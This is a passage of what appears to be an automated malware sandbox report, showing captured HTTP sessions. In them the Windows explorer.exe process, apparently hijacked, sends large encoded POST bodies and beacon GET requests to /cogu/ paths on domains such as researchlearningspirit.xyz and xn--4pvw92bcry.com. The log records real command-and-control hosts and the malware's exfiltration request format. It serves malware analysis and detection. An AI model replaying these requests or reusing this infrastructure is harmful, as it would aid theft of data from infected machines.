Oct 13, 2021 15:52:48.959147930 CEST	7644	OUT	Data Raw: 67 41 47 47 4c 5f 31 2d 79 4b 70 71 52 6f 52 47 50 75 36 7a 42 30 32 77 42 34 72 35 68 42 38 36 31 4b 45 4a 4c 49 69 5f 52 51 57 66 4d 37 4f 70 7a 6b 38 78 64 59 53 54 6d 65 6c 37 62 47 37 31 6b 47 69 47 76 33 61 4f 6f 2d 33 6e 76 72 48 36 58 58 Data Ascii: gAGGL_1-yKpqRoRGPu6zB02wB4r5hB861KEJLIi_RQWfM7Opzk8xdYSTmel7bG71kGiGv3aOo-3nvrH6XXS4akgUrRBgHEOE04lCBL6C2ohjd2w1XQ6OmH7trGWtmWr59GpUTrxFtbofY1AAb3VjPQJ19oqWwzexOLk1pM2L9dQFT9Dg9jNii5hxLOfpMQLSyECvmKOO~bHQWfhw9KEcz6HlDl(86YPVjciu6vzrRoBrqgi_8Ul
Oct 13, 2021 15:52:48.959330082 CEST	7646	OUT	Data Raw: 52 41 6d 72 67 68 34 65 4f 6e 28 42 73 37 68 56 38 4b 4e 43 6e 7a 46 64 7a 6a 41 31 31 4a 6d 66 37 48 6d 76 67 68 79 67 48 49 51 31 43 4c 48 4b 44 78 76 55 72 69 37 36 57 46 34 76 37 49 58 34 54 6c 58 52 53 58 38 36 54 65 45 51 31 42 55 6c 6b 5f Data Ascii: RAmrgh4eOn(Bs7hV8KNCnzFdzjA11Jmf7HmvghygHIQ1CLHKDxvUri76WF4v7IX4TlXRSX86TeEQ1BUlk_3z6_u0yHsfdTqSZYXqDgf4gT(tTtRY6NsbNFZvddNdofJilArVAnoUKyW2CWW6IjP06yOSvFCbNTlYVr4ONCyjsOGsBxHYjuZCaJVl4Yh4L86R9Lwtz6pDLPMCZvljVlyPvsRnMm~OCXUj6kJARtlpGmaWzPiqApx
Oct 13, 2021 15:52:48.959507942 CEST	7652	OUT	Data Raw: 51 5a 7a 75 6f 48 6e 67 4e 52 41 76 67 65 55 5f 44 4f 69 30 63 4b 50 48 51 6a 4f 35 28 76 36 6c 38 56 7a 54 48 72 34 5f 36 62 33 70 65 72 76 53 4a 44 4e 52 63 67 74 61 71 2d 6b 6f 28 2d 55 4b 4b 36 55 35 55 35 73 4e 71 5a 76 42 33 74 73 35 69 31 Data Ascii: QZzuoHngNRAvgeU_DOi0cKPHQjO5(v6l8VzTHr4_6b3pervSJDNRcgtaq-ko(-UKK6U5U5sNqZvB3ts5i1lQj8sQ8Vcqii6bN4jbth0xfolccO(okrdlmVW_ia0A(WPZENBUhWwYlW2tium9NSM-65PYx9QzvuKMbNMoY-NQr-rlepksRQfpE6IJsK6vLmIAG594qb6x5RzgdlonvkKjZoK4I42mp4XwNZMQei4wCufOjZR6TeT
Oct 13, 2021 15:52:48.959687948 CEST	7662	OUT	Data Raw: 73 71 73 50 32 62 64 48 72 53 6b 77 4d 67 73 79 34 44 75 6c 77 58 55 57 6b 73 4c 4d 6d 31 65 46 37 77 4c 4f 4c 52 6a 5a 6b 30 73 50 67 6a 46 67 28 61 77 73 4e 54 61 56 58 43 76 6d 6a 48 57 6a 32 55 68 42 66 6b 31 4a 34 4f 6f 6a 59 4e 46 36 61 4b Data Ascii: sqsP2bdHrSkwMgsy4DulwXUWksLMm1eF7wLOLRjZk0sPgjFg(awsNTaVXCvmjHWj2UhBfk1J4OojYNF6aKdKJUjoiuWVOXSXSc5hu_2D1mpP~ekOI4V9P59wFDNfK2oQV7xsYGwvJupJ7QoPVIMMDRta1keWgosVz69J0KuA2pmgr0DukAqULrJD1CS4p_4-1OyzLT23CuPBxGFl586rc6ATZ9JO5fTmOACZg6EDrWjovd8v10q
Oct 13, 2021 15:52:48.968467951 CEST	7668	OUT	Data Raw: 62 42 54 77 46 37 7a 79 77 56 41 2d 4b 6b 56 34 4d 38 7a 30 30 37 70 41 42 49 77 30 59 48 69 7a 65 69 66 38 56 33 74 47 6c 7a 69 61 7e 45 71 33 78 78 41 39 41 68 72 66 54 49 58 33 37 67 55 47 4c 68 73 46 49 57 4d 50 50 4a 36 57 39 65 70 62 43 66 Data Ascii: bBTwF7zywVA-KkV4M8z007pABIw0YHizeif8V3tGlzia~Eq3xxA9AhrfTIX37gUGLhsFIWMPPJ6W9epbCfnV8isQZI8lqRomimJHco5z6VFZqhK_LnVSHYHNHJTm6zK1w0sTQ0WJSR2EE2bVxZC2zyioxe99uqPy1GhcWkd2unkPUrm-o7G66ipSoKcY9WdT19K4YaTHqrejlMFWULLoKQxXNHaxNTpZQe8_BzZ4Mz8JkTUjveE
Oct 13, 2021 15:52:48.975795031 CEST	7717	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Oct 2021 13:52:48 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 13 Oct 2021 14:52:48 GMT Location: https://www.researchlearningspirit.xyz/cogu/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VnT1ZaxCa3%2Fw7CjdPuzUgIZs1FyGKid7Auf17vAWaHvO%2B%2Ba0j4mDA1Ibxhi8PtI10vJ08Ny1ajwYNNasU0BLhq4UoilNilLp7MezlCLtwJlEU9uQCaIAhOII1gHfs0sig2K8HZ7Z7xlN3RZe3LugBHA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 69d90cf1f8bc2b35-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.11.20	49841	172.67.139.41	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:52:48.959780931 CEST	7663	OUT	GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF HTTP/1.1 Host: www.researchlearningspirit.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:52:48.986309052 CEST	7718	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Oct 2021 13:52:48 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 13 Oct 2021 14:52:48 GMT Location: https://www.researchlearningspirit.xyz/cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FJHUKGD7m4lPg0r2vDoqOhKOktNs7235M%2BOqGfMe5IuYjYXck9Kgs8ldpLW6gFHnzgpnaSkuTyJUcBjsvgC9R4if%2FSKOq3%2FSQQnh%2BZ%2F7DrpkZZSwm0U%2BumIwh%2BWwMlWaMDQCv22WvCfz1zgpRGTOufY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69d90cf208673250-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.11.20	49842	75.2.115.196	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:52:54.012398005 CEST	7721	OUT	POST /cogu/ HTTP/1.1 Host: www.xn--4pvw92bcry.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.xn--4pvw92bcry.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.xn--4pvw92bcry.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 31 30 71 39 63 33 71 6a 32 76 37 4f 69 5a 43 69 37 67 43 46 6b 6a 4a 31 6f 75 58 48 74 33 32 5a 79 59 45 6c 46 58 75 71 62 78 68 31 6e 72 4e 30 5a 57 41 55 42 30 73 41 47 35 67 59 70 53 58 75 71 2d 69 30 62 57 33 6c 68 69 41 68 4e 49 6d 74 54 4b 77 43 68 42 63 30 70 4f 78 41 28 55 53 55 71 55 35 41 32 42 54 4c 57 41 51 73 68 5a 46 6f 72 44 53 53 55 4a 37 6d 6b 77 58 5f 36 6e 6f 4f 52 75 64 4f 57 76 31 55 37 4e 77 44 42 42 59 66 55 75 79 4b 48 6d 46 6a 70 45 61 4d 51 36 68 67 30 37 55 41 4a 6f 78 66 49 4d 7a 71 37 37 4f 50 30 34 58 57 4b 33 65 46 6b 4b 65 64 48 39 42 32 7e 46 79 52 59 56 70 57 37 6b 7a 70 62 55 63 50 6f 71 31 4e 42 53 78 59 35 4f 32 68 36 49 43 78 37 63 63 50 69 70 4e 47 76 43 6a 2d 73 33 67 66 55 37 71 68 44 48 74 49 65 50 69 4d 4b 4e 50 77 4c 68 72 4c 7e 54 6a 35 4f 64 44 71 77 38 48 33 7a 6e 37 6b 7e 54 70 5f 30 65 35 51 74 57 57 51 32 32 69 69 62 4b 78 77 6e 4b 75 71 36 48 71 77 6b 4d 56 4d 6e 7a 34 75 69 79 52 61 6f 79 45 65 38 45 50 6f 59 7a 5a 6b 71 79 56 50 36 6e 43 59 61 34 50 6a 61 31 54 45 34 43 74 43 6b 54 46 76 4d 30 58 43 41 49 6a 69 78 4d 6a 73 77 33 69 31 51 36 33 5a 64 55 4c 47 78 50 74 73 5a 32 66 43 78 33 56 69 36 49 38 45 55 68 44 37 6a 71 5a 67 28 36 47 4b 63 70 37 5a 57 6b 63 4b 63 6d 4d 77 50 64 44 47 35 53 52 59 35 7a 4f 36 57 51 70 45 78 6b 6c 62 30 54 66 70 53 69 31 61 47 62 77 65 4e 69 69 4d 67 5a 78 6d 67 44 66 76 41 2d 6b 31 55 68 49 52 53 30 39 6e 59 39 57 70 37 6e 6d 69 77 43 68 68 73 66 75 73 36 33 54 77 4a 54 46 66 47 6d 36 74 49 38 77 4a 4a 47 31 45 4b 57 4b 65 49 6c 50 71 53 33 67 62 28 6e 53 43 70 61 7e 57 28 65 58 37 4b 6d 49 41 4f 39 6c 48 37 56 73 4f 53 34 4d 4c 63 42 32 2d 28 75 35 54 78 54 45 5a 58 6b 4c 55 6e 58 74 74 43 30 65 65 56 31 49 6f 34 4f 69 50 64 34 7e 4f 6d 53 41 5f 32 65 77 34 6f 55 42 34 59 48 57 74 49 66 4c 41 45 4a 77 51 72 75 4a 61 6f 33 75 67 59 4c 5a 4d 63 4a 76 5a 6d 31 34 59 5a 75 65 6a 28 49 6f 45 6b 6c 54 2d 6c 51 53 43 55 7a 63 4e 44 51 79 48 62 49 46 6b 4b 76 30 5f 52 51 31 71 65 50 4b 6b 46 64 78 74 45 31 6a 7a 50 4c 51 6f 7a 63 76 6b 74 55 6a 78 6b 6a 6b 34 7a 4e 61 51 73 59 50 51 4e 4c 62 79 43 6d 45 37 71 35 75 4b 49 5a 45 42 74 2d 6c 76 67 66 56 6f 4f 54 49 77 47 55 67 51 56 4f 43 5f 43 42 62 6d 32 33 53 70 6a 78 56 78 43 79 4d 42 6b 75 7e 78 6d 53 79 49 51 34 63 6c 41 30 58 75 69 67 4e 75 42 63 50 55 54 55 4b 4d 7e 36 78 54 41 31 49 7a 68 71 56 72 7e 78 35 34 4a 6e 6e 4d 68 6f 54 71 66 75 50 72 38 4f 35 4c 47 47 54 48 66 59 39 4e 33 76 56 6c 54 4d 36 42 4c 6a 36 58 6e 36 74 67 33 47 59 37 33 4f 42 42 28 38 53 2d 72 71 77 66 32 6e 75 54 47 6c 54 53 4f 39 51 2d 44 57 75 72 38 52 63 4c 75 66 4f 4d 4d 78 4f 4b 34 34 62 58 4e 31 6a 79 4e 53 66 7a 7e 78 44 6d 67 70 28 61 6f 49 4c 43 41 74 59 39 34 69 5a 69 66 4c 50 58 66 52 4e 77 52 39 55 78 71 41 49 51 44 5a 56 75 4b 44 37 78 32 70 63 44 67 76 56 6f 6f 61 53 73 6b 61 71 43 62 6a 55 54 61 5f 5a 58 71 4c 32 34 4d 4f 5a 37 51 42 53 37 72 6b 47 63 76 30 76 6b 36 59 5a 37 68 53 4d 67 49 31 4d 30 32 4d 50 73 4b 78 6e 71 36 58 35 39 6d 68 54 64 6a 52 39 33 37 6a 76 71 69 4e 4b 6c 51 38 74 5a 56 39 6b 35 69 5a 77 35 78 66 42 68 65 67 75 4f 46 5f 50 45 44 63 52 39 61 43 62 67 6c 46 54 5a 68 6e 42 45 47 61 34 39 45 72 37 67 39 33 52 5a 66 68 46 4f 58 76 6d 41 66 6a 43 72 44 73 36 4e 72 38 41 41 53 6b 6b 33 70 33 6a 61 43 52 66 73 41 4e 66 75 66 36 76 4c 6b 63 57 79 38 70 71 4a 30 47 54 43 74 32 47 34 4c 4e 57 52 51 6c 6a 39 76 30 64 72 77 6f 48 4f 6c 54 53 6c 47 73 30 6f 36 46 4c 77 71 54 71 50 63 55 45 34 6d 63 31 44 79 6a 59 51 46 73 63 47 44 57 52 54 59 58 37 31 49 74 55 37 46 59 43 75 6a 74 59 55 78 41 4f 65 6f 54 4b 30 44 6b 4b 74 7e 4a 35 32 6d 65 45 47 53 36 51 4d 48 66 35 74 48 6e 71 77 72 6b 32 61 38 70 47 57 67 48 43 73 69 52 64 77 6c 6f 32 41 7e 7a 5a 72 57 41 35 6e 6a 45 33 67 67 59 38 64 77 6d 4f 4a 73 38 6e 4f 74 44 31 42 4d 35 6a 54 77 54 5a 47 32 58 63 6b 67 6e 46 4a 33 42 69 31 7a 71 6e 69 74 33 47 54 55 2d 61 6e 51 56 53 68 56 69 52 7a 45 58 43 6d 6d 52 51 35 77 50 34 50 46 6f 75 36 71 43 75 57 34 39 31 4d 30 62 5a 45 47 31 36 30 50 55 7e 58 6d 37 41 41 6e 6e 6b 2d Data Ascii: E6=10q9c3qj2v7OiZCi7gCFkjJ1ouXHt32ZyYElFXuqbxh1nrN0ZWAUB0sAG5gYpSXuq-i0bW3lhiAhNImtTKwChBc0pOxA(USUqU5A2BTLWAQshZForDSSUJ7mkwX_6noORudOWv1U7NwDBBYfUuyKHmFjpEaMQ6hg07UAJoxfIMzq77OP04XWK3eFkKedH9B2~FyRYVpW7kzpbUcPoq1NBSxY5O2h6ICx7ccPipNGvCj-s3gfU7qhDHtIePiMKNPwLhrL~Tj5OdDqw8H3zn7k~Tp_0e5QtWWQ22iibKxwnKuq6HqwkMVMnz4uiyRaoyEe8EPoYzZkqyVP6nCYa4Pja1TE4CtCkTFvM0XCAIjixMjsw3i1Q63ZdULGxPtsZ2fCx3Vi6I8EUhD7jqZg(6GKcp7ZWkcKcmMwPdDG5SRY5zO6WQpExklb0TfpSi1aGbweNiiMgZxmgDfvA-k1UhIRS09nY9Wp7nmiwChhsfus63TwJTFfGm6tI8wJJG1EKWKeIlPqS3gb(nSCpa~W(eX7KmIAO9lH7VsOS4MLcB2-(u5TxTEZXkLUnXttC0eeV1Io4OiPd4~OmSA_2ew4oUB4YHWtIfLAEJwQruJao3ugYLZMcJvZm14YZuej(IoEklT-lQSCUzcNDQyHbIFkKv0_RQ1qePKkFdxtE1jzPLQozcvktUjxkjk4zNaQsYPQNLbyCmE7q5uKIZEBt-lvgfVoOTIwGUgQVOC_CBbm23SpjxVxCyMBku~xmSyIQ4clA0XuigNuBcPUTUKM~6xTA1IzhqVr~x54JnnMhoTqfuPr8O5LGGTHfY9N3vVlTM6BLj6Xn6tg3GY73OBB(8S-rqwf2nuTGlTSO9Q-DWur8RcLufOMMxOK44bXN1jyNSfz~xDmgp(aoILCAtY94iZifLPXfRNwR9UxqAIQDZVuKD7x2pcDgvVooaSskaqCbjUTa_ZXqL24MOZ7QBS7rkGcv0vk6YZ7hSMgI1M02MPsKxnq6X59mhTdjR937jvqiNKlQ8tZV9k5iZw5xfBheguOF_PEDcR9aCbglFTZhnBEGa49Er7g93RZfhFOXvmAfjCrDs6Nr8AASkk3p3jaCRfsANfuf6vLkcWy8pqJ0GTCt2G4LNWRQlj9v0drwoHOlTSlGs0o6FLwqTqPcUE4mc1DyjYQFscGDWRTYX71ItU7FYCujtYUxAOeoTK0DkKt~J52meEGS6QMHf5tHnqwrk2a8pGWgHCsiRdwlo2A~zZrWA5njE3ggY8dwmOJs8nOtD1BM5jTwTZG2XckgnFJ3Bi1zqnit3GTU-anQVShViRzEXCmmRQ5wP4PFou6qCuW491M0bZEG160PU~Xm7AAnnk-oueMWlBtmVZfljrmAMDBtaPisooAF-jOoO2DnUgBKonhYzlAl9MNM7Ku3zYhDI7rxvrLCX7pz1OuUrH7y0oQ~8uB0_q6e_9JpTled8VT9T(3(-p3Anoyggobp0KlquYgkYAxbYRjTCvOw7M-vMwV3AYVkdr0M24f562WZsOUD5aoD2aSmyDWAdncW3rZFEnk0Dr4rLNJY89iT9Z39DJOgiKDHgtVslpUXQN07OJTV2fgtYQHShvW1psieWHVw8SreyaGaWnbx0kZoEr38DzB5YZBx-WVFa6hBiFAUamZjRs6lZahpBDYU7r2U323qxOIqreZ6NxsD2f3MfXRblvnv29LOFKkurYaDupImQ7LI2GkGcIe9pVAtsGrLN(sWec3MEdSZxa3wk0QMfa-UKyh9ZKf4sPpaw1G(kiRO6BaPS6t4pSpa1R47iUWrDiltnwmqcVYIXfvOZYKXbF7xsmIz4JhMf3D5XR6uPogYO8njR7Qxlrf6MX70HDEkcIHNGgAX_D2LT~jan1-GgzyDodkPDE2QU8KQT9xj48Uu3f53BwLfsI9wgRwTnu0uWx7VcYyjn0EEN2ewdsCsb0EIH~ozPtm1t8-QNZPR_aVpXb4T5Dzgr~rxhitNuwg63S0e7W1sqEYwaDrMZ3XFMJfWOAEyi8HowDyaww52ojaYnNf1jRmhtHc(zRkM-pLyoi7eFWx5vduCZZLsOeRv8WGdMRglHQPOh7E7PLvYlbZANH71pAKbHOd8jO35goERtdVsip2MOQa3pGpT-nuHsdTTupocSi_qswK4zdLw_mxSSYyY6y3kXSHdXHw6oYirZ6mbBotAenR9mLkj4Z9BeYsjnFXTMme0xk1Xb9iUXAEwIEZ36WBoMClsuv2jw853K7dXmfFlKBa
Oct 13, 2021 15:52:54.012484074 CEST	7730	OUT	Data Raw: 6a 79 44 57 39 33 35 65 4d 35 61 5a 32 45 33 56 44 4d 6f 47 6c 74 47 67 30 63 68 5a 6f 57 7a 76 77 45 79 68 57 35 56 58 56 71 50 59 39 6d 50 61 69 4b 46 67 66 50 28 74 5a 2d 63 32 58 47 71 6c 69 30 4a 79 45 42 46 49 55 74 64 68 48 76 35 47 63 6c Data Ascii: jyDW935eM5aZ2E3VDMoGltGg0chZoWzvwEyhW5VXVqPY9mPaiKFgfP(tZ-c2XGqli0JyEBFIUtdhHv5Gclzlet2Pfsp5Nqjb~en64fP2WRqPnRLAvpTWKlDv0qCMiKaF3Qj98TtT9UXXqwe30aUcX8wzVeuKlbccs6ZGuPikaLPGCjtIPCDQc5jLZutwQudMDmyrrJX-7TPzbOnE69GlIpV9MGlZVEL0LFPr4GTu9d4ns-z6Zqb
Oct 13, 2021 15:52:54.012531996 CEST	7732	OUT	Data Raw: 53 69 79 47 64 75 70 49 41 32 45 67 6d 7a 76 74 33 55 33 59 63 6d 57 34 66 50 4d 39 67 54 34 7a 56 32 47 71 44 48 6c 70 47 4d 32 74 72 46 4f 78 64 67 69 78 4f 51 28 50 67 48 4f 59 39 67 4b 42 7e 34 34 53 4c 33 52 77 6b 31 6d 68 68 71 74 5a 37 4c Data Ascii: SiyGdupIA2Egmzvt3U3YcmW4fPM9gT4zV2GqDHlpGM2trFOxdgixOQ(PgHOY9gKB~44SL3Rwk1mhhqtZ7L0xJhEdabSEWEnWhdXs9-vh7StLiAh65M9bUdhKEqlCRWz9otmVxmDXWAf9jrYzQzAo5YMHLlk-8YZgKThXj_JFK4PgNrFy0Rnb37h229oS~RZJiVXr2hWgZacHYoGYQshG2VVXDGnqz_qYguy1T1w6oNbn2UA2mUm
Oct 13, 2021 15:52:54.023425102 CEST	7736	OUT	Data Raw: 45 4c 38 37 63 2d 67 34 45 4d 4f 50 77 62 62 71 57 4e 56 34 34 62 4f 53 7e 4b 65 67 4e 68 51 73 57 62 36 34 52 54 63 31 34 4c 54 7a 59 71 30 35 28 62 72 66 4b 59 66 62 6b 46 49 48 50 51 64 4b 67 6f 6f 6c 55 4e 41 34 66 55 6c 62 74 30 4c 64 59 50 Data Ascii: EL87c-g4EMOPwbbqWNV44bOS~KegNhQsWb64RTc14LTzYq05(brfKYfbkFIHPQdKgoolUNA4fUlbt0LdYPA6pyLLpN(R004rk3PN~FCka9G7v3~EOYUrgJRC(ERk8q~eP03DRhq6HWt7b6fAs_bjYthCqncsVrWpN1awhqyjdxDYBWAixfmGagQcu6nWnzPmuzcSaL(sdZQ9oetklBVC~Ldq4C~5NvSu6bFMQdl9KcxXBSWfZy~
Oct 13, 2021 15:52:54.023490906 CEST	7743	OUT	Data Raw: 42 48 41 65 33 6c 37 63 4d 62 6a 47 50 38 32 4f 58 50 76 35 4d 56 73 44 28 76 46 7a 48 36 28 76 45 79 66 4f 45 58 30 5f 47 30 76 73 45 5a 6d 73 31 55 42 49 70 49 65 65 52 65 4a 4c 30 61 7e 61 42 79 65 5f 45 59 62 75 43 43 45 62 44 56 38 6e 4b 6a Data Ascii: BHAe3l7cMbjGP82OXPv5MVsD(vFzH6(vEyfOEX0_G0vsEZms1UBIpIeeReJL0a~aBye_EYbuCCEbDV8nKjSXpqQ2heLcHN(AVwMdJICsP-mR77bW5YJiijhsZygqoYUyEFakWrCoiNd3VusioeN9LYAetPN7Rxgh71K4InUZjP8rSXxvtWVTEgFF9CmZC7xapM0g2ZTprEnxICbjlnhtDRqg7-dTwlxl6rOZ7Q3NsEbxdsNc~aq
Oct 13, 2021 15:52:54.023722887 CEST	7751	OUT	Data Raw: 67 4d 35 72 51 54 4f 71 48 57 4a 50 5a 79 6c 52 62 31 63 57 77 56 6e 4f 5a 68 52 39 77 41 4c 77 45 6c 32 58 63 4a 72 65 79 33 62 79 6c 52 57 76 4c 67 57 33 42 2d 6f 4c 54 6f 4e 43 79 41 50 73 4d 42 44 67 62 33 51 38 32 50 76 4c 7a 33 43 4b 7a 4c Data Ascii: gM5rQTOqHWJPZylRb1cWwVnOZhR9wALwEl2XcJrey3bylRWvLgW3B-oLToNCyAPsMBDgb3Q82PvLz3CKzL6mfM81oT21GgRF8AA2jz2qHmML35uWVcSOGHcg0J2hYEXnb0HJ8mU8Szt5SGHavUo2Gto_7exJqz8OabqKH-tIDNLqW5uQWwHrFE~UoyXBUQ3mlZQvg6Ek7mIfJFZdIYDKYz2nfGGvM3QUG68SRejLKFUpNoQuoCF
Oct 13, 2021 15:52:54.023895025 CEST	7758	OUT	Data Raw: 47 45 74 70 30 6a 4f 58 58 34 69 34 41 76 4a 55 65 42 5a 63 78 72 38 4d 51 69 50 70 32 76 5a 77 58 41 4a 6a 6f 76 55 56 66 4f 6a 4b 44 47 66 6d 51 54 6f 66 47 4a 31 69 57 72 6c 39 31 38 38 63 4e 49 34 4a 6f 6e 4b 6d 6a 4c 67 65 66 43 78 35 31 67 Data Ascii: GEtp0jOXX4i4AvJUeBZcxr8MQiPp2vZwXAJjovUVfOjKDGfmQTofGJ1iWrl9188cNI4JonKmjLgefCx51ggP0l9VnNgzxAPWfAxCv6ddXPSrjlMU1vUBMMfylsJUN3KzJ5LIY4a02yjlRSZXktx0FFAqtb9pISeDuU1OQ7Vp0O3dHpbhEPfUJ9ngFF19ZtodqfoZeVzBHoA33pwpJBC6exCM1V0hJP5QFw6MgllPZSaeP5ePDpS
Oct 13, 2021 15:52:54.034296036 CEST	7761	OUT	Data Raw: 42 4c 74 73 42 43 32 53 49 52 67 6b 68 34 30 33 49 78 68 38 28 45 77 53 31 75 28 33 6d 36 46 68 42 6c 42 43 39 48 6d 61 4a 50 7a 44 47 68 56 79 4c 4e 42 6c 53 48 51 77 42 73 6c 6a 68 56 59 67 65 6c 4e 6e 57 49 78 73 43 78 73 70 30 6e 34 36 75 75 Data Ascii: BLtsBC2SIRgkh403Ixh8(EwS1u(3m6FhBlBC9HmaJPzDGhVyLNBlSHQwBsljhVYgelNnWIxsCxsp0n46uu246opqgPddsG(8gghTAVeGMNJOyNC0sSfagPWo9jU0~cW_mqAvEQYpZAlKKd94vHc9eJfgkaHCByoqU28vZZNMoioSxYR4w0eKP_bH4xeh~h498XR-rF1xI2AJ7kcHCCTirqfht382KZF-HxLz7ppAHEjPzHkmda9
Oct 13, 2021 15:52:54.034411907 CEST	7763	OUT	Data Raw: 34 41 59 55 79 44 58 32 4b 62 30 6f 56 5a 69 75 34 79 4e 68 42 30 28 67 48 6f 6d 62 32 74 45 55 70 76 30 59 55 54 39 7a 4a 2d 47 5a 44 70 62 38 52 73 50 4f 62 45 31 4f 6a 74 66 37 50 55 43 48 35 7a 7e 6f 71 44 66 2d 32 65 54 77 32 4b 44 63 46 51 Data Ascii: 4AYUyDX2Kb0oVZiu4yNhB0(gHomb2tEUpv0YUT9zJ-GZDpb8RsPObE1Ojtf7PUCH5z~oqDf-2eTw2KDcFQzBEy(dnq2ePzWG(POe0qNK9Tj5b5Lpx57Y(AoNEWw5Najk9hw7WHDTkkn3SQ(aFf8ERuIS8nmHydt8iqdu6g4X9KWjbwKSQ9xCbfBdZ6~wz6p2cxhqWPkLDVKhD17F8mSQpEJe(2~UXNGs9Tg-uoVwKd7BVfzgD2d
Oct 13, 2021 15:52:54.034586906 CEST	7765	OUT	Data Raw: 51 70 55 56 4c 72 28 78 4a 38 6c 63 6f 35 56 64 30 39 66 66 30 36 52 53 4a 77 6e 63 48 61 7e 59 37 4d 62 4b 4e 61 75 2d 79 2d 73 7a 6d 39 44 4f 56 4e 36 58 41 61 67 62 7e 59 4a 4a 63 6a 5a 4b 32 34 46 48 4e 6a 50 2d 7e 43 74 46 44 63 77 37 79 33 Data Ascii: QpUVLr(xJ8lco5Vd09ff06RSJwncHa~Y7MbKNau-y-szm9DOVN6XAagb~YJJcjZK24FHNjP-~CtFDcw7y3Z8KcW4mOmmrVyCdZNfOVcmfxX0K8FCkm06Ge04740RKXXNTzqr8G(_GOru3Lpm6yydsvZiz_6EY56vCH(qAyc_CYOVZR3vYNF_IfwaxFSmkuTirpkx2YZrettSzH6FwkPRGjxCme8xtg3mhVBw9y0Yp9bxgzQ7Hq9
Oct 13, 2021 15:52:54.034636974 CEST	7769	OUT	Data Raw: 67 70 77 49 70 46 64 32 5a 6a 74 48 7a 2d 76 57 4d 6e 32 6a 34 48 61 39 71 69 75 57 6b 6b 70 52 48 73 76 38 77 6d 49 66 71 56 45 42 4c 47 62 61 64 42 4f 62 55 53 46 75 52 42 57 59 77 46 73 66 31 32 70 75 4b 7a 57 51 37 49 74 6a 68 72 4e 56 54 2d Data Ascii: gpwIpFd2ZjtHz-vWMn2j4Ha9qiuWkkpRHsv8wmIfqVEBLGbadBObUSFuRBWYwFsf12puKzWQ7ItjhrNVT-3zdEeERU~3viyD8eD0WFuayjyvBfZx5BcaNaRPSMXtlEn0lr0u4iodSkPgkeZoJ-iPSeHEO74q1DycsXZ-YsCHBq5FOfRDSLJknw8NuRtsT6fWM8w6gzmfo1pd2eiNqnMOmUVDYD1ADW6nfV4KhPy0zMelBpxdyjj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.11.20	49843	75.2.115.196	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:52:54.023787022 CEST	7751	OUT	GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&GJE=6lTPJF HTTP/1.1 Host: www.xn--4pvw92bcry.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:52:54.173382044 CEST	7853	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Oct 2021 13:52:54 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: nginx Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.11.20	49844	154.215.231.81	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
